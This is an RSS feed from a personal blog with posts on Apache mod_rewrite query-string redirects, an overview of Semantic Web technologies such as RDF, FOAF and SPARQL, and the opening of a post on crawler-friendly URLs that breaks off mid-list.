<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Simon Whatley &#187; url</title>
	<atom:link href="http://www.simonwhatley.co.uk/tag/url/feed" rel="self" type="application/rss+xml" />
	<link>http://www.simonwhatley.co.uk</link>
	<description>The opposite of every great idea is another great idea</description>
	<lastBuildDate>Wed, 02 Nov 2011 09:28:34 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
		<item>
		<title>Apache RewriteRule and query strings</title>
		<link>http://www.simonwhatley.co.uk/apache-rewriterule-and-query-strings</link>
		<comments>http://www.simonwhatley.co.uk/apache-rewriterule-and-query-strings#comments</comments>
		<pubDate>Fri, 18 Feb 2011 10:56:20 +0000</pubDate>
		<dc:creator>Simon</dc:creator>
				<category><![CDATA[Development]]></category>
		<category><![CDATA[.htaccess]]></category>
		<category><![CDATA[Apache]]></category>
		<category><![CDATA[Apache HTTP Server]]></category>
		<category><![CDATA[mod_rewrite]]></category>
		<category><![CDATA[SES]]></category>
		<category><![CDATA[url]]></category>
		<category><![CDATA[URL rewriting]]></category>
		<category><![CDATA[webserver]]></category>

		<guid isPermaLink="false">http://www.simonwhatley.co.uk/?p=3855</guid>
		<description><![CDATA[At first glance, the way the Apache mod_rewrite module handles query strings can be a little intimidating. mod_rewrite rules typically sit on your server in a file called .htaccess, “catching” requests for URLs. The module checks each URL request against a series of rules and conditions you have set. If the request meets the rules and conditions, it applies the necessary changes to the URL, then reprocesses the request with the changes you have directed.]]></description>
			<content:encoded><![CDATA[<p>At first glance, the way the Apache <code>mod_rewrite</code> module handles query strings can be a little intimidating. <code>mod_rewrite</code> rules typically sit on your server in a file called <code>.htaccess</code>, &#8220;catching&#8221; requests for <abbr title="Uniform Resource Locator">URL</abbr>s. The module checks each <abbr title="Uniform Resource Locator">URL</abbr> request against a series of rules and conditions you have set. If the request meets the rules and conditions, it applies the necessary changes to the <abbr title="Uniform Resource Locator">URL</abbr>, then reprocesses the request with the changes you have directed. Apache helpfully provides some <a href="http://httpd.apache.org/docs/2.0/mod/mod_rewrite.html#rewritecond" title="Apache RewriteCond Directive" target="_blank" rel="nofollow">RewriteCond documentation</a>.</p>
<p>The most common mistake people make when thinking of <abbr title="Uniform Resource Locator">URL</abbr> redirection with <code>mod_rewrite</code> is believing that it creates or changes something on the server. It doesn&#8217;t; it only maps an incoming request onto a different <abbr title="Uniform Resource Locator">URL</abbr> or file.</p>
<p>Here is a simple example, redirecting a page depending on its query string. The rewrite condition and rule look like this:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">RewriteCond %{QUERY_STRING} ^id=([0-9]*)$
RewriteRule ^page\.php$ http://www.example.com/page/%1.php [R=302,L]</pre></div></div>

<p>The rewrite condition matches an ID made up of the digits 0 to 9 (because <code>[0-9]*</code> also matches an empty value, <code>[0-9]+</code> is the safer choice if at least one digit is required). You might expect the following behaviour:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">/page.php?id=1 -&gt; http://www.example.com/page/1.php
/page.php?id=10 -&gt; http://www.example.com/page/10.php</pre></div></div>

<p>However, if the substitution doesn’t contain a query string of its own, then <strong>the original query is passed through</strong> by default. This results in the following:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">/page.php?id=1 -&gt; http://www.example.com/page/1.php?id=1
/page.php?id=10 -&gt; http://www.example.com/page/10.php?id=10</pre></div></div>

<p>If you want to discard the original query string, you must append a bare question mark to the end of the substitution <abbr title="Uniform Resource Locator">URL</abbr>. This supplies an empty query string, so the original one is <strong>not appended</strong>.</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">RewriteCond %{QUERY_STRING} ^id=([0-9]*)$
RewriteRule ^page\.php$ http://www.example.com/page/%1.php? [R=302,L]</pre></div></div>
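
<p>As a hedged aside, assuming a server running Apache 2.4 or later (something the example above does not state), the same effect can be sketched with the <code>QSD</code> (query string discard) flag instead of the trailing question mark. The pattern here also uses <code>[0-9]+</code>, so an empty ID is not matched:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;"># Assumes Apache 2.4+; QSD drops the original query string
RewriteCond %{QUERY_STRING} ^id=([0-9]+)$
RewriteRule ^page\.php$ http://www.example.com/page/%1.php [QSD,R=302,L]</pre></div></div>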

<p>Putting it all together, here&#8217;s a quick reference for dealing with query strings in a <code>RewriteRule</code>.</p>
<p>Keep original query (i.e., the default behaviour)</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">RewriteRule ^page\.php$ /target.php [L]
# from http://www.example.com/page.php?foo=bar
# to http://www.example.com/target.php?foo=bar</pre></div></div>

<p>Discard original query</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">RewriteRule ^page\.php$ /target.php? [L]
# from http://www.example.com/page.php?foo=bar
# to http://www.example.com/target.php</pre></div></div>

<p>Replace original query</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">RewriteRule ^page\.php$ /target.php?bar=baz [L]
# from http://www.example.com/page.php?foo=bar
# to http://www.example.com/target.php?bar=baz</pre></div></div>

<p>Append original query to new query</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">RewriteRule ^page\.php$ /target.php?bar=baz [QSA,L]
# from http://www.example.com/page.php?foo=bar
# to http://www.example.com/target.php?bar=baz&amp;foo=bar</pre></div></div>
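
<p>A variation on the replace case, sketched here as an illustration rather than taken from the reference above: a value captured from the original query string can be reused in the new one. The parameter names <code>foo</code> and <code>bar</code> are placeholders.</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;"># Hypothetical example: copy the value of "foo" into a new "bar" parameter
RewriteCond %{QUERY_STRING} ^foo=([^&amp;]+)$
RewriteRule ^page\.php$ /target.php?bar=%1 [L]
# from http://www.example.com/page.php?foo=123
# to http://www.example.com/target.php?bar=123</pre></div></div>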

<p>Dave Child has created a great <a href="http://www.addedbytes.com/cheat-sheets/mod_rewrite-cheat-sheet/" title="mod_rewrite cheat sheet" target="_blank" rel="nofollow">mod_rewrite cheat sheet</a>: a one-page reference listing the flags for the <code>RewriteRule</code> and <code>RewriteCond</code> directives, the server variables, a regular expression guide and several examples of common rules.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.simonwhatley.co.uk/apache-rewriterule-and-query-strings/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Apache .htaccess query string redirects</title>
		<link>http://www.simonwhatley.co.uk/apache-htaccess-query-string-redirects</link>
		<comments>http://www.simonwhatley.co.uk/apache-htaccess-query-string-redirects#comments</comments>
		<pubDate>Thu, 17 Feb 2011 21:53:42 +0000</pubDate>
		<dc:creator>Simon</dc:creator>
				<category><![CDATA[Development]]></category>
		<category><![CDATA[.htaccess]]></category>
		<category><![CDATA[Apache]]></category>
		<category><![CDATA[Apache HTTP Server]]></category>
		<category><![CDATA[mod_rewrite]]></category>
		<category><![CDATA[SES]]></category>
		<category><![CDATA[url]]></category>
		<category><![CDATA[URL rewriting]]></category>
		<category><![CDATA[webserver]]></category>

		<guid isPermaLink="false">http://www.simonwhatley.co.uk/?p=3857</guid>
		<description><![CDATA[One of the most common tasks performed by Apache and htaccess is the manipulation of a URL and configuring a redirect for a specific page.]]></description>
			<content:encoded><![CDATA[<p>One of the most common tasks performed by Apache and <code>htaccess</code> is the manipulation of a <abbr title="Uniform Resource Locator">URL</abbr> and configuring a redirect for a specific page. Creating a <strong>single page redirect</strong> in Apache is a simple task using the <code>mod_alias</code> module.</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">Redirect /page.php http://www.example.com/target.php</pre></div></div>

<p>More commonly, however, you&#8217;re likely to want to do a <strong>mass-redirection of pages</strong>. To accomplish this, you may use the <code>RedirectMatch</code> directive.</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">RedirectMatch ^/category/(.*)$ http://www.example.com/topic/$1</pre></div></div>

<p>This will redirect any page from the <code>category</code> folder to the corresponding one in the <code>topic</code> folder with a convenient <strong>one-to-one redirect</strong>.</p>
<p>However, neither <code>Redirect</code> nor <code>RedirectMatch</code> allows you to specify a query string for the redirect source, because both directives match against the <abbr title="Uniform Resource Locator">URL</abbr> path only. In other words, the following statements will never match a request such as <code>/page.php?id=1</code>, so they are effectively ignored.</p>
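<p>Both directives issue a temporary (302) redirect unless told otherwise. As a minimal sketch, assuming the pages have moved permanently, an optional status argument can be placed before the source:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;"># Assumption: the move is permanent, so request a 301 rather than the default 302
Redirect 301 /page.php http://www.example.com/target.php
RedirectMatch 301 ^/category/(.*)$ http://www.example.com/topic/$1</pre></div></div>
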

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;"># single page redirect
Redirect /page.php?id=1  http://www.example.com/page/1
Redirect /page.php?id=10  http://www.example.com/page/10
&nbsp;
# multi-page redirect
RedirectMatch ^/page.php?id=([0-9]*)$  http://www.example.com/page/$1</pre></div></div>

<p>The solution requires a change of focus from Apache&#8217;s <code>mod_alias</code> module to the <code>mod_rewrite</code> module. Here’s an example.</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">RewriteEngine On
RewriteCond %{REQUEST_URI}  ^/page\.php$
RewriteCond %{QUERY_STRING} ^id=([0-9]*)$
RewriteRule ^(.*)$ http://www.example.com/page/%1.php [L,R=301]</pre></div></div>

<p>The <code>mod_rewrite</code> module uses a rule-based rewriting engine (based on a regular-expression parser) to rewrite requested <abbr title="Uniform Resource Locator">URL</abbr>s on the fly. It supports an unlimited number of rules and an unlimited number of attached rule conditions for each rule, to provide a really flexible and powerful <abbr title="Uniform Resource Locator">URL</abbr> manipulation mechanism. The <abbr title="Uniform Resource Locator">URL</abbr> manipulations can depend on various tests of server variables, environment variables, <abbr title="HyperText Transfer Protocol">HTTP</abbr> headers, or time stamps.</p>
<p>So what does this all mean with respect to the above example?</p>
<p>The first line enables the rewriting engine. Note that the <code>mod_rewrite</code> Apache module must be installed and enabled in order to use the <code>RewriteEngine</code> directive.</p>
<p>The <code>RewriteCond</code> statements set all the rewrite conditions. The fourth line, the real rewrite directive, will be executed <strong>if and only if all conditions are satisfied by the current request</strong>.</p>
<p>The first condition is for the page I need to redirect. This condition is included to prevent any unexpected errors if other pages are using the ID variable. Next, I base the rewrite rule on the value of the current request&#8217;s query string. The ID value within the regular expression is wrapped in parentheses so that the match can be reused later as a back-reference.</p>
<p>The final line is the rewrite rule. This line looks similar to the <code>RedirectMatch</code> statement. It specifies the redirection source, then the redirection target. The value captured by the second <code>RewriteCond</code> is referenced in the target with the <code>%N</code> keyword (in this example %1). The <code>RewriteRule</code> also includes a comma-separated list of flags that should be applied to the rule. In this case, <code>L</code> stops the rewriting process immediately whilst <code>R=301</code> specifies a permanent external redirect (301 is an <a href="http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html" title="HTTP Status Codes" target="_blank" rel="nofollow">HTTP Status Code</a>).</p>
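<p>A more compact variation can be sketched as follows. It assumes the rules live in an <code>.htaccess</code> file in the document root, where the <code>RewriteRule</code> pattern is matched against the path without its leading slash, so the <code>REQUEST_URI</code> condition is folded into the pattern. The trailing question mark is an addition that stops the original <code>id</code> query string being carried over to the target:</p>

<div class="wp_syntax"><div class="code"><pre class="text" style="font-family:monospace;">RewriteEngine On
# Capture one or more digits from the query string
RewriteCond %{QUERY_STRING} ^id=([0-9]+)$
# Match page.php directly; the trailing ? discards the original query string
RewriteRule ^page\.php$ http://www.example.com/page/%1.php? [L,R=301]</pre></div></div>
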
<p><strong>Further reading:</strong></p>
<ul>
<li><a href="http://httpd.apache.org/docs/2.2/rewrite/" title="Apache URL rewriting guide" target="_blank" rel="nofollow">Apache URL rewriting guide</a></li>
<li><a href="http://httpd.apache.org/docs/2.2/mod/mod_rewrite.html" title="Apache mod_rewrite" target="_blank" rel="nofollow">Apache mod_rewrite</a></li>
<li><a href="http://httpd.apache.org/docs/2.2/mod/mod_alias.html" title="Apache mod_alias" target="_blank" rel="nofollow">Apache mod_alias</a></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.simonwhatley.co.uk/apache-htaccess-query-string-redirects/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>An Introduction to the Semantic Web</title>
		<link>http://www.simonwhatley.co.uk/an-introduction-to-the-semantic-web</link>
		<comments>http://www.simonwhatley.co.uk/an-introduction-to-the-semantic-web#comments</comments>
		<pubDate>Fri, 18 Jun 2010 12:20:49 +0000</pubDate>
		<dc:creator>Simon</dc:creator>
				<category><![CDATA[Semantic Web]]></category>
		<category><![CDATA[data]]></category>
		<category><![CDATA[DCMI]]></category>
		<category><![CDATA[Dublin Core]]></category>
		<category><![CDATA[Dublin Core Metadata Initiative]]></category>
		<category><![CDATA[FOAF]]></category>
		<category><![CDATA[Friend of a Friend]]></category>
		<category><![CDATA[graphs]]></category>
		<category><![CDATA[HTTP]]></category>
		<category><![CDATA[Linked Data]]></category>
		<category><![CDATA[machine readable]]></category>
		<category><![CDATA[Natural Language Processing]]></category>
		<category><![CDATA[ontology]]></category>
		<category><![CDATA[OpenCalais]]></category>
		<category><![CDATA[OWL]]></category>
		<category><![CDATA[protocol]]></category>
		<category><![CDATA[PURL]]></category>
		<category><![CDATA[RDF]]></category>
		<category><![CDATA[RDF query language]]></category>
		<category><![CDATA[RDFa]]></category>
		<category><![CDATA[RDFs]]></category>
		<category><![CDATA[Resource Description Framework]]></category>
		<category><![CDATA[semantic]]></category>
		<category><![CDATA[SPARQL]]></category>
		<category><![CDATA[subject-predicate-object]]></category>
		<category><![CDATA[Thomson Reuters]]></category>
		<category><![CDATA[Tim Berners-Lee]]></category>
		<category><![CDATA[Triplestore]]></category>
		<category><![CDATA[Uniform Resource Identifier]]></category>
		<category><![CDATA[Uniform Resource Locator]]></category>
		<category><![CDATA[Uniform Resource Name]]></category>
		<category><![CDATA[URI]]></category>
		<category><![CDATA[url]]></category>
		<category><![CDATA[web of data]]></category>
		<category><![CDATA[Web Ontology Language]]></category>
		<category><![CDATA[world wide web]]></category>
		<category><![CDATA[XML]]></category>

		<guid isPermaLink="false">http://www.simonwhatley.co.uk/?p=3559</guid>
		<description><![CDATA[The Semantic Web is a web of data. There is lots of data we all use every day, and most of it is not part of the web. I can see my bank statements on the web, and my photographs, and I can see my appointments in a calendar. But can I see my photos in a calendar to see what I was doing when I took them and on a map so I know where I took them? Can I see bank statement lines in a calendar? The answer, right now, is no.]]></description>
			<content:encoded><![CDATA[<p>The <a href="http://en.wikipedia.org/wiki/Semantic_Web" title="Wikipedia: Semantic Web" target="_blank" rel="nofollow">Semantic Web</a> is a <a href="http://en.wikipedia.org/wiki/Linked_Data" title="Wikipedia: Linked Data" target="_blank" rel="nofollow">web of data</a>. There is lots of data we all use every day, and most of it is not part of the web. I can see my bank statements on the web, and my photographs, and I can see my appointments in a calendar. But can I see my photos in a calendar to see what I was doing when I took them and on a map so I know where I took them? Can I see bank statement lines in a calendar? The answer, right now, is no.</p>
<p>But why not? Because we don&#8217;t have a web of data. Because data is controlled by applications, and each application keeps its data to itself; applications don&#8217;t like to share.</p>
<p>The original Web mainly concentrated on the interchange of documents. The Semantic Web, however, is about two things. It is about common formats for integration and combination of data drawn from diverse sources. It is also about language for recording how the data relates to real world objects. That allows a person, or a machine, to start off in one database, and then move through an unending set of databases which are connected not by wires but by being about the same thing.</p>
<p>Tim Berners-Lee describes the Semantic Web vision as:</p>
<blockquote><p>I have a dream for the Web [in which computers] become capable of analysing all the data on the Web, the content, links, and transactions between people and computers. A Semantic Web, which should make this possible, has yet to emerge, but when it does, the day-to-day mechanisms of trade, bureaucracy and our daily lives will be handled by machines talking to machines. The intelligent agents people have touted for ages will finally materialise.</p></blockquote>
<p>What are the ideas and technologies that facilitate this vision? Below I give an overview and links to a number of them:</p>
<h3>Linked Data</h3>
<p>Linked Data is about using the Web to connect related data that wasn&#8217;t previously linked, or using the Web to lower the barriers to linking data currently linked using other methods. More specifically, Wikipedia defines Linked Data as &#8220;a term used to describe a recommended best practice for exposing, sharing, and connecting pieces of data, information, and knowledge on the Semantic Web using <abbr title="Uniform Resource Identifier">URIs</abbr> and <abbr title="Resource Description Framework">RDF</abbr>.&#8221;</p>
<ul>
<li><a href="http://linkeddata.org" title="Linked Data: Connect Distributed Data Across The Web" target="_blank" rel="nofollow">http://linkeddata.org</a></li>
<li><a href="http://en.wikipedia.org/wiki/Linked_Data" title="Wikipedia: Linked Data" target="_blank" rel="nofollow">http://en.wikipedia.org/wiki/Linked_Data</a></li>
</ul>
<h3>Resource Description Framework</h3>
<p>The Resource Description Framework (<abbr title="Resource Description Framework">RDF</abbr>) is a general-purpose language for representing information in the Web.</p>
<p>The <strong>Resource Description Framework Schema (<abbr title="Resource Description Framework Schema">RDF-S</abbr>)</strong> is a semantic extension of <abbr title="Resource Description Framework">RDF</abbr> that provides mechanisms for describing groups of related resources and the relationships between these resources.</p>
<ul>
<li><a href="http://www.w3.org/TR/rdf-schema/" title="World Wide Web Consortium: RDF Schema" target="_blank" rel="nofollow">http://www.w3.org/TR/rdf-schema/</a></li>
<li><a href="http://en.wikipedia.org/wiki/RDF_Schema" title="Wikipedia: RDF Schema" target="_blank" rel="nofollow">http://en.wikipedia.org/wiki/RDF_Schema</a></li>
</ul>
<p>The <strong>Resource Description Framework in Attributes (<abbr title="Resource Description Framework in Attributes">RDFa</abbr>)</strong> allows authors to add meaning to web page elements. Using a few simple <abbr title="eXtensible HyperText Markup Language">XHTML</abbr> attributes, authors can mark up human-readable data with machine-readable indicators for browsers and other programs to interpret. A web page can include markup for items as simple as the title of an article, or as complex as a user&#8217;s complete social network.</p>
<ul>
<li><a href="http://www.w3.org/TR/xhtml-rdfa-primer/" title="World Wide Web Consortium: XHTML RDFa Primer" target="_blank" rel="nofollow">http://www.w3.org/TR/xhtml-rdfa-primer/</a></li>
<li><a href="http://en.wikipedia.org/wiki/RDFa" title="Wikipedia: RDFa" target="_blank" rel="nofollow">http://en.wikipedia.org/wiki/RDFa</a></li>
</ul>
<h3>Friend of a Friend (<abbr title="Friend of a Friend">FOAF</abbr>)</h3>
<p>The <em>Friend of a Friend</em> project is creating a Web of machine-readable pages describing people, the links between them and the things they create and do. <abbr title="Friend of a Friend">FOAF</abbr> is about your place in the Web, and the Web&#8217;s place in our world. <abbr title="Friend of a Friend">FOAF</abbr> is a simple technology that makes it easier to share and use information about people and their activities (e.g. photos, calendars, weblogs), to transfer information between Web sites, and to automatically extend, merge and re-use it online.</p>
<ul>
<li><a href="http://www.foaf-project.org" title="FOAF Project" target="_blank" rel="nofollow">http://www.foaf-project.org</a></li>
<li><a href="http://en.wikipedia.org/wiki/FOAF_(software)" title="Wikipedia: FOAF (Software)" target="_blank" rel="nofollow">http://en.wikipedia.org/wiki/FOAF_(software)</a></li>
<li><a href="http://en.wikipedia.org/wiki/Friend_of_a_friend" title="Wikipedia: Friend of a Friend" target="_blank" rel="nofollow">http://en.wikipedia.org/wiki/Friend_of_a_friend</a></li>
<li><a href="http://xmlns.com/foaf/spec/" title="FOAF Vocabulary Specification" target="_blank" rel="nofollow">http://xmlns.com/foaf/spec/</a></li>
</ul>
<h3>Web Ontology Language (<abbr title="Web Ontology Language">OWL</abbr>)</h3>
<p>The <abbr title="Web Ontology Language">OWL</abbr> Web Ontology Language is designed for use by applications that need to process the content of information instead of just presenting information to humans. <abbr title="Web Ontology Language">OWL</abbr> facilitates greater machine interpretability of Web content than that supported by <abbr title="eXtensible Markup Language">XML</abbr>, <abbr title="Resource Description Framework">RDF</abbr>, and <abbr title="Resource Description Framework">RDF</abbr> Schema (<abbr title="Resource Description Framework Schema">RDF-S</abbr>) by providing additional vocabulary along with a formal semantics.</p>
<ul>
<li><a href="http://www.w3.org/TR/owl-features/" title="World Wide Web Consortium: OWL Web Ontology Language" target="_blank" rel="nofollow">http://www.w3.org/TR/owl-features/</a></li>
<li><a href="http://en.wikipedia.org/wiki/Web_Ontology_Language" title="Wikipedia: Web Ontology Language" target="_blank" rel="nofollow">http://en.wikipedia.org/wiki/Web_Ontology_Language</a></li>
</ul>
<h3>Dublin Core Metadata Initiative (<abbr title="Dublin Core Metadata Initiative">DCMI</abbr>)</h3>
<p>The Dublin Core set of metadata elements provides a small and fundamental group of text elements through which most resources can be described and catalogued. Using only 15 base text fields, a Dublin Core metadata record can describe physical resources such as books, digital materials such as video, sound, image, or text files, and composite media like web pages. Metadata records based on Dublin Core are intended to be used for cross-domain information resource description and have become standard in the fields of library science and computer science. Implementations of Dublin Core typically make use of <abbr title="eXtensible Markup Language">XML</abbr> and are Resource Description Framework (<abbr title="Resource Description Framework">RDF</abbr>) based.</p>
<ul>
<li><a href="http://dublincore.org" title="Dublin Core Metadata Initiative" target="_blank" rel="nofollow">http://dublincore.org</a></li>
<li><a href="http://en.wikipedia.org/wiki/Dublin_core" title="Wikipedia: Dublin Core" target="_blank" rel="nofollow">http://en.wikipedia.org/wiki/Dublin_core</a></li>
</ul>
<h3>Triplestore</h3>
<p>A triplestore is a purpose-built database for the storage and retrieval of Resource Description Framework (<abbr title="Resource Description Framework">RDF</abbr>) metadata.</p>
<p>Much like a relational database, information is stored in a triplestore and retrieved via a query language called <abbr title="SPARQL Protocol and RDF Query Language">SPARQL</abbr>. Unlike a relational database, a triplestore is optimised for the storage and retrieval of many short statements called triples, in the form of subject-predicate-object, like &#8220;Bob is 35&#8221; or &#8220;Bob knows Fred&#8221;.</p>
<ul>
<li><a href="http://en.wikipedia.org/wiki/Triplestore" title="Wikipedia: Triplestore" target="_blank" rel="nofollow">http://en.wikipedia.org/wiki/Triplestore</a></li>
</ul>
<h3>SPARQL Protocol and RDF Query Language (<abbr title="SPARQL Protocol and RDF Query Language">SPARQL</abbr>)</h3>
<p><abbr title="SPARQL Protocol and RDF Query Language">SPARQL</abbr> is an <abbr title="Resource Description Framework">RDF</abbr> query language, which can be used to express queries across diverse data sources, whether the data is stored natively as <abbr title="Resource Description Framework">RDF</abbr> or viewed as <abbr title="Resource Description Framework">RDF</abbr> via middleware. <abbr title="SPARQL Protocol and RDF Query Language">SPARQL</abbr> contains capabilities for querying required and optional graph patterns along with their conjunctions and disjunctions. <abbr title="SPARQL Protocol and RDF Query Language">SPARQL</abbr> also supports extensible value testing and constraining queries by source <abbr title="Resource Description Framework">RDF</abbr> graph. The results of <abbr title="SPARQL Protocol and RDF Query Language">SPARQL</abbr> queries can be results sets or <abbr title="Resource Description Framework">RDF</abbr> graphs.</p>
<ul>
<li><a href="http://www.w3.org/TR/rdf-sparql-query/" title="World Wide Web Consortium: SPARQL Query" target="_blank" rel="nofollow">http://www.w3.org/TR/rdf-sparql-query/</a></li>
<li><a href="http://en.wikipedia.org/wiki/Sparql" title="Wikipedia: SPARQL" target="_blank" rel="nofollow">http://en.wikipedia.org/wiki/Sparql</a></li>
</ul>
<h3>Simple Knowledge Organization System (<abbr title="Simple Knowledge Organization System">SKOS</abbr>) </h3>
<p><abbr title="Simple Knowledge Organization System">SKOS</abbr> is a family of formal languages designed for representation of thesauri, classification schemes, taxonomies, subject-heading systems, or any other type of structured controlled vocabulary. <abbr title="Simple Knowledge Organization System">SKOS</abbr> is built upon <abbr title="Resource Description Framework">RDF</abbr> and <abbr title="Resource Description Framework Schema">RDF-S</abbr>, and its main objective is to enable easy publication of controlled structured vocabularies for the Semantic Web.</p>
<ul>
<li><a href="http://www.w3.org/2004/02/skos/" title="World Wide Web Consortium: SKOS" target="_blank" rel="nofollow">http://www.w3.org/2004/02/skos/</a></li>
<li><a href="http://en.wikipedia.org/wiki/Simple_Knowledge_Organization_System" title="Wikipedia: Simple Knowledge Organisation System" target="_blank" rel="nofollow">http://en.wikipedia.org/wiki/Simple_Knowledge_Organization_System</a></li>
</ul>
<h3>Persistent Uniform Resource Locator (<abbr title="Persistent Uniform Resource Locator">PURL</abbr>)</h3>
<p>A <abbr title="Persistent Uniform Resource Locator">PURL</abbr> is a type of Uniform Resource Locator (<abbr title="Uniform Resource Locator">URL</abbr>) that does not directly describe the location of the resource to be retrieved but instead describes an intermediate, more persistent location which, when retrieved, results in redirection (e.g. via a 302 <abbr title="HyperText Transfer Protocol">HTTP</abbr> status code) to the current location of the final resource.</p>
<p><abbr title="Persistent Uniform Resource Locator">PURLs</abbr> are an interim measure, while Uniform Resource Names (<abbr title="Uniform Resource Names">URNs</abbr>) are being mainstreamed, to solve the problem of transitory <abbr title="Uniform Resource Identifier">URIs</abbr> in location-based <abbr title="Uniform Resource Identifier">URI</abbr> schemes like <abbr title="HyperText Transfer Protocol">HTTP</abbr>.</p>
<ul>
<li><a href="http://purl.org/docs/index.html" title="Persistent Uniform Resource Locators" target="_blank" rel="nofollow">http://purl.org/docs/index.html</a></li>
<li><a href="http://en.wikipedia.org/wiki/Persistent_Uniform_Resource_Locator" title="Wikipedia: Persistent Uniform Resource Locator" target="_blank" rel="nofollow">http://en.wikipedia.org/wiki/Persistent_Uniform_Resource_Locator</a></li>
</ul>
<h3>Thomson Reuters OpenCalais</h3>
<p>OpenCalais is a rapidly growing toolkit of capabilities that allow you to readily incorporate state-of-the-art semantic functionality within your blog, content management system, website or application.</p>
<p>The OpenCalais Web Service automatically creates rich semantic metadata for the content you submit. Using Natural Language Processing (<abbr title="Natural Language Processing">NLP</abbr>), machine learning and other methods, Calais analyses your document and finds the entities within it. Calais goes beyond classic entity identification returning the facts and events hidden within your text as well.</p>
<ul>
<li><a href="http://www.opencalais.com" title="Thomson Reuters OpenCalais" target="_blank" rel="nofollow">http://www.opencalais.com</a></li>
</ul>
<p>If you have any more suggestions that should be included above, I&#8217;ll be happy to hear them.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.simonwhatley.co.uk/an-introduction-to-the-semantic-web/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Optimise Your URLs for Web Crawlers and Indexing</title>
		<link>http://www.simonwhatley.co.uk/optimise-your-urls-for-web-crawlers-and-indexing</link>
		<comments>http://www.simonwhatley.co.uk/optimise-your-urls-for-web-crawlers-and-indexing#comments</comments>
		<pubDate>Thu, 08 Oct 2009 11:15:05 +0000</pubDate>
		<dc:creator>Simon</dc:creator>
				<category><![CDATA[Analytics]]></category>
		<category><![CDATA[Search]]></category>
		<category><![CDATA[Canonical]]></category>
		<category><![CDATA[Google]]></category>
		<category><![CDATA[Index]]></category>
		<category><![CDATA[Information retrieval]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Robots exclusion standard]]></category>
		<category><![CDATA[search engine]]></category>
		<category><![CDATA[search engine optimisation]]></category>
		<category><![CDATA[search engines]]></category>
		<category><![CDATA[url]]></category>
		<category><![CDATA[URL redirection]]></category>
		<category><![CDATA[Web archiving]]></category>
		<category><![CDATA[web crawlers]]></category>
		<category><![CDATA[Web search engine]]></category>
		<category><![CDATA[webmaster]]></category>
		<category><![CDATA[world wide web]]></category>
		<category><![CDATA[Yahoo]]></category>

		<guid isPermaLink="false">http://www.simonwhatley.co.uk/?p=2011</guid>
		<description><![CDATA[Many questions about website architecture, crawling and indexing, and even ranking issues can be boiled down to one central issue: How easy is it for search engines to crawl your site?]]></description>
			<content:encoded><![CDATA[<p>Many questions about website architecture, crawling and indexing, and even ranking issues can be boiled down to one central issue: How easy is it for search engines to crawl your site?</p>
<p>The Internet is not simply a big place, it is a huge place, and new content is being created all the time. Google, Yahoo and Microsoft each have finite resources, so when faced with the nearly infinite quantity of content that&#8217;s available online, their crawlers are only able to find and crawl a percentage of that content. Then, of all the content they&#8217;ve crawled, they&#8217;re only able to index a portion. Of course, as storage gets cheaper, the search engines are able to index more and more content each day, but not at the pace the Web is growing.</p>
<p><abbr title="Uniform Resource Locator">URL</abbr>s are like the bridges between your website and a search engine&#8217;s crawler: crawlers need to be able to find and cross those bridges (i.e., find and crawl your <abbr title="Uniform Resource Locator">URL</abbr>s) in order to get to your site&#8217;s content. If your <abbr title="Uniform Resource Locator">URL</abbr>s are complicated or redundant, crawlers are going to spend time tracing and retracing their steps; if your <abbr title="Uniform Resource Locator">URL</abbr>s are organised and lead directly to distinct content, crawlers can spend their time accessing your content rather than crawling through empty pages, or crawling the same content over and over via different <abbr title="Uniform Resource Locator">URL</abbr>s.</p>
<p>So, what can you do as a website developer or owner to reduce that labyrinth of <abbr title="Uniform Resource Locator">URL</abbr>s and help crawlers find more of your content faster? Below are a few ideas:</p>
<ul>
<li><strong>Remove unnecessary query string details from the URL.</strong><br />
Parameters in the <abbr title="Uniform Resource Locator">URL</abbr> that don&#8217;t change the content of the page&#8211;like session <abbr title="Identifier">ID</abbr>s or list sort orders&#8211;can be removed from the <abbr title="Uniform Resource Locator">URL</abbr> and put into a cookie. By putting this information in a cookie and <a href="http://en.wikipedia.org/wiki/URL_redirection#HTTP_status_codes_3xx" title="Wikipedia: URL Redirection">301 redirecting</a> to a <q>clean</q> <abbr title="Uniform Resource Locator">URL</abbr>, you retain the information and reduce the number of <abbr title="Uniform Resource Locator">URL</abbr>s pointing to that same content.
</li>
<li><strong>Stop infinite pagination in, for example, lists and calendars.</strong><br />
